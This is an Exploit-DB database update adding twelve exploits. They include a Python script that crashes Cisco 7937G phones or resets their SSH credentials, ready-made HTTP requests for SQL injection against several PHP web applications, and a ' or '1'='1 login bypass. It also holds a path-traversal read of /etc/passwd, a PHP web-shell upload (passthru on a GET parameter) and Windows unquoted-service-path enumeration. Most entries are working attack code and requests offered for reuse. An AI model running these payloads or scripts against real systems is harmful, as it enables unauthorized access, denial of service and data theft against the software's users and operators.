DB: 2020-11-17

12 changes to exploits/shellcodes

KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path
Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path
Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path
Atheros Coex Service Application 8.0.0.255 - 'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path

Cisco 7937G - DoS/Privilege Escalation
Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)
Water Billing System 1.0 - 'id' SQL Injection (Authenticated)
Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)
User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection
PMB 5.6 - 'chemin' Local File Disclosure
Car Rental Management System 1.0 - Remote Code Execution (Authenticated)
Car Rental Management System 1.0 - 'car_id' Sql Injection

exploits/hardware/remote/49057.py

@@ -0,0 +1,177 @@
+# Exploit Title: Cisco 7937G 1-4-5-7 - DoS/Privilege Escalation
+# Date: 2020-08-10
+# Exploit Author: Cody Martin
+# Vendor Homepage: https://cisco.com
+# Version: <=SIP-1-4-5-7
+# Tested On: SIP-1-4-5-5, SIP-1-4-5-7
+#!/usr/bin/python
+
+import sys
+import getopt
+import requests
+import paramiko
+import socket
+import os
+
+
+def main(argv):
+    target = ""
+    attack = ""
+    username = ""
+    password = ""
+    divider = "====================
+==========================
+="
+
+    help_text = '''
+exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--u=
+ser username -p/--password password]
+%s
+Example: exploit.py -t 192.168.1.200 -a 1
+Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password=
+ villa
+%s
+Attack types:
+1: DoS with automatic device reset
+2: DoS without automatic device reset
+3: Change SSH credentials of target device
+''' % (divider, divider)
+
+    if len(sys.argv) == 1:
+        print(help_text)
+        sys.exit(2)
+    try:
+        opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target==
+", "attack=", "user=", "password="])
+    except getopt.GetoptError:
+        print(help_text)
+        sys.exit(2)
+    for opt, arg in opts:
+        if opt == "-h":
+            print(help_text)
+            sys.exit()
+        elif opt in ("-t", "--target"):
+            target = arg
+        elif opt in ("-a", "--attack"):
+            attack = arg
+        elif opt in ("-u", "--user"):
+            username = arg
+        elif opt in ("-p", "--password"):
+            password = arg
+
+    if username != "" and password != "" and attack == "3":
+        print("Starting SSH attack!")
+        print(divider)
+        print("Target: ", target, "\nAttack: ", attack, "\nUser: ", usernam=
+e, "\nPassword: ", password)
+        finished = attack_ssh(target, username, password)
+    elif attack == "1":
+        print("Starting DoS reset attack!")
+        print(divider)
+        print("Target: ", target, "\nAttack: ", attack)
+        finished = dos_one(target)
+    elif attack == "2":
+        print("Starting DoS non-reset attack!")
+        print(divider)
+        print("Target: ", target, "\nAttack: ", attack)
+        finished = dos_two(target)
+
+    print(divider)
+
+    if finished == 1:
+        print("DoS reset attack completed!")
+    elif finished == 2:
+        print("DoS non-reset attack completed!")
+        print("Device must be power cycled to restore functionality.")
+    elif finished == 3:
+        tell = "SSH attack finished!\nTry to login using the supplied cre=
+dentials %s:%s" % (username, password)
+        connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group=
+1-sha1 %s@%s" % (username, target)
+        print(tell)
+        print("You must specify the key exchange when connecting or the dev=
+ice will be DoS'd!")
+        print(connection_example)
+    elif finished == 0:
+        print("Something strange happened. Attack likely unsuccessful.")
+    sys.exit()
+
+
+def dos_one(target):
+    url = "http://%s/localmenus.cgi" % target
+    data = "A"*46
+    payload = {"func": "609", "data": data, "rphl": "1"}
+    print("FIRING ZE MIZZLES!")
+    for i in range(1000):
+        try:
+            r = requests.post(url=url, params=payload, timeout=5)
+            if r.status_code != 200:
+                print("Device doesn't appear to be functioning or web acces=
+s is not enabled.")
+                sys.exit()
+        except requests.exceptions.RequestException:
+            return 1
+
+    return 0
+
+
+def dos_two(target):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.settimeout(15)
+    try:
+        sock.connect((target, 22))
+    except OSError:
+        print("Device doesn't appear to be functioning (already DoS'd?) or =
+SSH is not enabled.")
+        sys.exit()
+
+    transport = paramiko.Transport(sock=sock, disabled_algorithms={"k=
+ex": ["diffie-hellman-group-exchange-sha1",
+                                                                           =
+"diffie-hellman-group14-sha1",
+                                                                           =
+"diffie-hellman-group1-sha1"]})
+
+    fd = os.open("/dev/null", os.O_WRONLY)
+    savefd = os.dup(2)
+    os.dup2(fd, 2)
+
+    try:
+        transport.connect(username="notreal", password="notreal")
+    except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHExcep=
+tion):
+        os.dup2(savefd, 2)
+        return 2
+
+    return 0
+
+
+def attack_ssh(target, username, password):
+    url = "http://%s/localmenus.cgi" % target
+    payload_user = {"func": "403", "set": "401", "name1": username, "name=
+2": username}
+    payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2"=
+: password}
+    print("FIRING ZE MIZZLES!")
+    try:
+        r = requests.post(url=url, params=payload_user, timeout=5)
+        if r.status_code != 200:
+            print("Device doesn't appear to be functioning or web access is=
+ not enabled.")
+            sys.exit()
+
+        r = requests.post(url=url, params=payload_pass, timeout=5)
+        if r.status_code != 200:
+            print("Device doesn't appear to be functioning or web access is=
+ not enabled.")
+            sys.exit()
+    except requests.exceptions.RequestException:
+        print("Device doesn't appear to be functioning or web access is not=
+ enabled.")
+        sys.exit()
+
+    return 3
+
+
+if __name__ == "__main__":
+    main(sys.argv[1:])

exploits/php/webapps/49046.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)
+# Date: 11-14-2020
+# Exploit Author: Matthew Aberegg, Alex Prieto
+# Vendor Homepage: https://pandorafms.com/
+# Patch Link: https://github.com/pandorafms/pandorafms/commit/1258a1a63535f60924fb69b1f7812c678570cc8e
+# Software Link: https://pandorafms.com/community/get-started/
+# Version: Pandora FMS 7.0 NG 749
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A blind SQL injection vulnerability exists in the "CG Items" functionality of Pandora FMS.  
+# Vulnerable Parameter : data
+
+
+# POC
+
+POST /pandora_console/ajax.php?data=(SELECT+1+FROM+(SELECT(SLEEP(5)))A) HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 23
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/pandora_console/index.php?sec=eventos&sec2=operation/events/events
+Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
+
+page=general%2Fcg_items

exploits/php/webapps/49048.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Water Billing System 1.0 - 'id' SQL Injection (Authenticated)
+# Date: 2020-11-14
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Author ID: 8763
+# Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html
+# Version: 1.0
+# Tested on: Apache2 and Windows 10
+
+Vulnerable param: id
+-------------------------------------------------------------------------
+GET /WBS/edituser.php?id=-9%27+UNION+SELECT+1,@@VERSION,3,4--%20- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/WBS/user.php
+Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
+
+
+
+
+-------------------------------------------------------------------------
+
+Source Code: edituser.php
+
+..
+..
+..
+$user_id =$_REQUEST['id'];
+$result = mysqli_query($conn,"SELECT * FROM user WHERE id  = '$user_id'");
+..
+..
+
+-------------------------------

exploits/php/webapps/49051.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)
+# Date: 2020-11-14
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Author ID: 8763
+# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Apache2 and Windows 10
+
+Vulnerable param: id
+-------------------------------------------------------------------------
+GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 163
+Origin: http://localhost
+Connection: close
+Cookie: COOKIE
+Upgrade-Insecure-Requests: 1
+
+
+-------------------------------------------------------------------------
+
+Source Code: \WBS\viewbill.php
+
+..
+..
+..
+$id =$_REQUEST['id'];
+$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'");
+..
+..
+
+-------------------------------

exploits/php/webapps/49052.txt

@@ -0,0 +1,29 @@
+# Exploit Title: User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection 
+# Date: 2020–11–14
+# Exploit Author: Mayur Parmar(th3cyb3rc0p)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 2.1
+# Tested on POPOs(Linux)
+
+SQL Injection:
+SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data.
+
+Attack Vector:
+An attacker can gain admin panel access using malicious sql injection quiries.
+
+Steps to reproduce:
+1. Open admin login page using following URl:
+-> http://localhost/loginsystem/admin/
+
+2. Now put below Payload in both the fields( User ID & Password)
+Payload: ' or '1'='1
+
+3. Server accepted our payload and we bypassed admin panel without any credentials, 
+
+IMPACT:
+if any attacker can gain admin panel access than they can Update & Delete Userdata 
+
+Suggested Mitigation/Remediation Actions
+Parameterized queries should be used to separate the command and data portions of the intended query to the database. These queries prevent an attacker from tampering with the query logic and extending a concatenated database query string. Code reviews should be conducted to identify any additional areas were the application or other applications in the organization are vulnerable to this attack.
+Additionally, input validation should be enforced on the server side in order to ensure that only expected data is sent in queries. Where possible security specific libraries should be used in order to provide an additional layer of protection.

exploits/php/webapps/49054.txt

@@ -0,0 +1,23 @@
+# Exploit Title: PMB 5.6 - 'chemin' Local File Disclosure
+# Date: 2020-10-13
+# Google Dork: inurl:opac_css
+# Exploit Author: 41-trk (Tarik Bakir)
+# Vendor Homepage: http://www.sigb.net
+# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
+# Affected versions : <= 5.6 
+# Tested on: Ubuntu 18.04.1
+
+The PMB Gif Image is not sanitizing the 'chemin',
+which leads to Local File Disclosure.
+
+As of today (2020-10-13) this issue is unfixed.
+
+Vulnerable code: (getgif.php )
+
+line 55    $fp2=@fopen($chemin, "rb");
+line 68    fpassthru($fp)
+
+
+========================= Proof-of-Concept ===================================================
+
+    http://127.0.0.1:2121/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik

exploits/php/webapps/49055.txt

@@ -0,0 +1,65 @@
+# Exploit Title: Car Rental Management System 1.0 - Remote Code Execution (Authenticated)
+# Date: 2020-11.13
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Author ID: 8763
+# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Apache2 - Windows 10
+
+Vulnerable param: img
+-------------------------------------------------------------------------
+POST /car_rental/admin/ajax.php?action=save_settings HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------30709612614161811513297969444
+Content-Length: 777
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/car_rental/admin/index.php?page=site_settings
+Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
+
+-----------------------------30709612614161811513297969444
+Content-Disposition: form-data; name="name"
+
+Car Rental Management System
+-----------------------------30709612614161811513297969444
+Content-Disposition: form-data; name="email"
+
+info@sample.comm
+-----------------------------30709612614161811513297969444
+Content-Disposition: form-data; name="contact"
+
++6948 8542 623
+-----------------------------30709612614161811513297969444
+Content-Disposition: form-data; name="about"
+
+content
+
+-----------------------------30709612614161811513297969444
+Content-Disposition: form-data; name="img"; filename="k.php"
+Content-Type: application/octet-stream
+
+<?php echo passthru($_GET['k']);?>
+-----------------------------30709612614161811513297969444--
+
+
+Source Code:
+
+admin\admin_class.php:
+--------------------------------------------------------------------
+                if($_FILES['img']['tmp_name'] != ''){
+                                                                                                                $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
+                                                                                                                $move = move_uploaded_file($_FILES['img']['tmp_name'],'assets/uploads/'. $fname);
+                                                                                                                $data .= ", avatar = '$fname' ";
+
+                                                }
+
+--------------------------------------------------------------------
+
+POC:
+http://{site]/admin/assets/uploads/{FILE}.php?k=whoami

exploits/php/webapps/49056.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Car Rental Management System 1.0 - 'car_id' Sql Injection
+# Date: 2020-11.13
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Author ID: 8763
+# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Apache2 - Windows 10
+
+Vulnerable param: car_id
+-------------------------------------------------------------------------
+GET /car_rental/booking.php?car_id=1+UNION+ALL+SELECT+1,@@VERSION,3,4,5,6,7,8,9,10# HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+
+Source Code:
+
+booking.php:
+--------------------------------------------------------------------
+<?php
+$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']);
+foreach($qry->fetch_array() as $k => $val){
+                $$k=$val;
+}

exploits/windows/local/49047.txt

@@ -0,0 +1,33 @@
+# Exploit Title: KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path
+# Discovery by: IRVIN GIL
+# Discovery Date: 2020-11-14
+# Vendor Homepage:  https://www.kite.com/
+# Tested Version: 1.2020.1113.1
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+KiteService       KiteService          C:\Program Files\Kite\KiteService.exe           Auto
+
+# Service info:
+
+C:\>sc qc "KiteService"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: KiteService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : KiteService
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

exploits/windows/local/49049.txt

@@ -0,0 +1,35 @@
+# Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path
+# Author: Jair Amezcua
+# Date: 2020-11-10
+# Vendor Homepage: https://www.iobit.com
+# Software Link: https://www.iobit.com/es/advancedsystemcarepro.php
+# Version : 13.0.0.157
+# Tested on: Windows 10 64bit(EN)
+# CVE : N/A
+
+# 1. Description:
+# Unquoted service paths in Advanced System Care Service 13  v13.0.0.157 have an unquoted service path.
+
+# PoC
+===========
+
+C:\>sc qc AdvancedSystemCareService13
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: AdvancedSystemCareService13
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe
+        LOAD_ORDER_GROUP   : System Reserved
+        TAG                : 0
+        DISPLAY_NAME       : Advanced SystemCare Service 13
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+
+#Description Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.

exploits/windows/local/49050.txt

@@ -0,0 +1,34 @@
+# Title: Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path
+# Author: Jair Amezcua
+# Date: 2020-11-10
+# Vendor Homepage: https://www.logitech.com/es-mx
+# Software Link: https://support.logi.com/hc/en-us/articles/360024692874--Downloads-Wireless-Solar-Keyboard-K750
+# Version : 1.10.3.0
+# Tested on: Windows 10 64bit(EN)
+# CVE : N/A
+
+# 1. Description:
+# Unquoted service paths in Logitech Solar Keyboard Service  v1.10.3.0 have an unquoted service path.
+
+# PoC
+===========
+
+C:\>sc qc L4301_Solar
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: L4301_Solar
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Logitech\SolarApp\L4301_Solar.exe
+        LOAD_ORDER_GROUP   : PlugPlay
+        TAG                : 0
+        DISPLAY_NAME       : Logitech Solar Keyboard Service
+        DEPENDENCIES       : PlugPlay
+        SERVICE_START_NAME : LocalSystem
+
+
+#Description Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.

exploits/windows/local/49053.txt

@@ -0,0 +1,30 @@
+#Exploit Title: Atheros Coex Service Application 8.0.0.255 -'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path
+#Exploit Author : Isabel Lopez
+#Exploit Date: 2020-11-13
+#Vendor Homepage : https://www.file.net/process/ath_coexagent.exe.html
+#Link Software : https://www.boostbyreason.com/resource-file-9102-ath_coexagent-exe.aspx
+#Tested on OS: Windows 8.1 (64bits)
+
+
+# 1. Description
+# Atheros Coex Service Application 8.0.0.255 has an unquoted service path.
+
+# 2. PoC
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"
+
+ZAtheros Bt&Wlan Coex Agent	ZAtheros Bt&Wlan Coex Agent	C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe    Auto
+
+C:\>sc qc WCAssistantService
+[SC] QueryServiceConfig SUCCES
+
+SERVICE_NAME: WCAssistantService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ZAtheros Bt&Wlan Coex Agent
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem

files_exploits.csv

@@ -10424,6 +10424,10 @@ id,file,description,date,author,type,platform,port
 49041,exploits/windows/local/49041.txt,"DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path",2020-11-13,"Teresa Q",local,windows,
 49042,exploits/windows/local/49042.txt,"SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path",2020-11-13,"Mara Ramirez",local,windows,
 49043,exploits/windows/local/49043.txt,"IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path",2020-11-13,"Isabel Lopez",local,windows,
+49047,exploits/windows/local/49047.txt,"KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path",2020-11-16,"IRVIN GIL",local,windows,
+49049,exploits/windows/local/49049.txt,"Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path",2020-11-16,"Jair Amezcua",local,windows,
+49050,exploits/windows/local/49050.txt,"Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path",2020-11-16,"Jair Amezcua",local,windows,
+49053,exploits/windows/local/49053.txt,"Atheros Coex Service Application 8.0.0.255 - 'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path",2020-11-16,"Isabel Lopez",local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -17864,6 +17868,7 @@ id,file,description,date,author,type,platform,port
 48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
 48958,exploits/hardware/remote/48958.py,"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse",2020-10-27,LiquidWorm,remote,hardware,
 48994,exploits/hardware/remote/48994.py,"TP-Link WDR4300 - Remote Code Execution (Authenticated)",2020-11-05,"Patrik Lantz",remote,hardware,
+49057,exploits/hardware/remote/49057.py,"Cisco 7937G - DoS/Privilege Escalation",2020-11-16,"Cody Martin",remote,hardware,
 42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java,
 42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware,
 42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows,
@@ -40861,6 +40866,13 @@ id,file,description,date,author,type,platform,port
 49040,exploits/multiple/webapps/49040.txt,"Touchbase.io 1.10 - Stored Cross Site Scripting",2020-11-13,"Simran Sankhala",webapps,multiple,
 49044,exploits/php/webapps/49044.txt,"OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure",2020-11-13,"Jinson Varghese Behanan",webapps,php,
 49045,exploits/php/webapps/49045.sh,"October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)",2020-11-13,"Sivanesh Ashok",webapps,php,
+49046,exploits/php/webapps/49046.txt,"Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)",2020-11-16,"Matthew Aberegg",webapps,php,
+49048,exploits/php/webapps/49048.txt,"Water Billing System 1.0 - 'id' SQL Injection (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,
+49051,exploits/php/webapps/49051.txt,"Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,
+49052,exploits/php/webapps/49052.txt,"User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection",2020-11-16,"Mayur Parmar",webapps,php,
+49054,exploits/php/webapps/49054.txt,"PMB 5.6 - 'chemin' Local File Disclosure",2020-11-16,41-trk,webapps,php,
+49055,exploits/php/webapps/49055.txt,"Car Rental Management System 1.0 - Remote Code Execution (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,
+49056,exploits/php/webapps/49056.txt,"Car Rental Management System 1.0 - 'car_id' Sql Injection",2020-11-16,"Mehmet Kelepçe",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,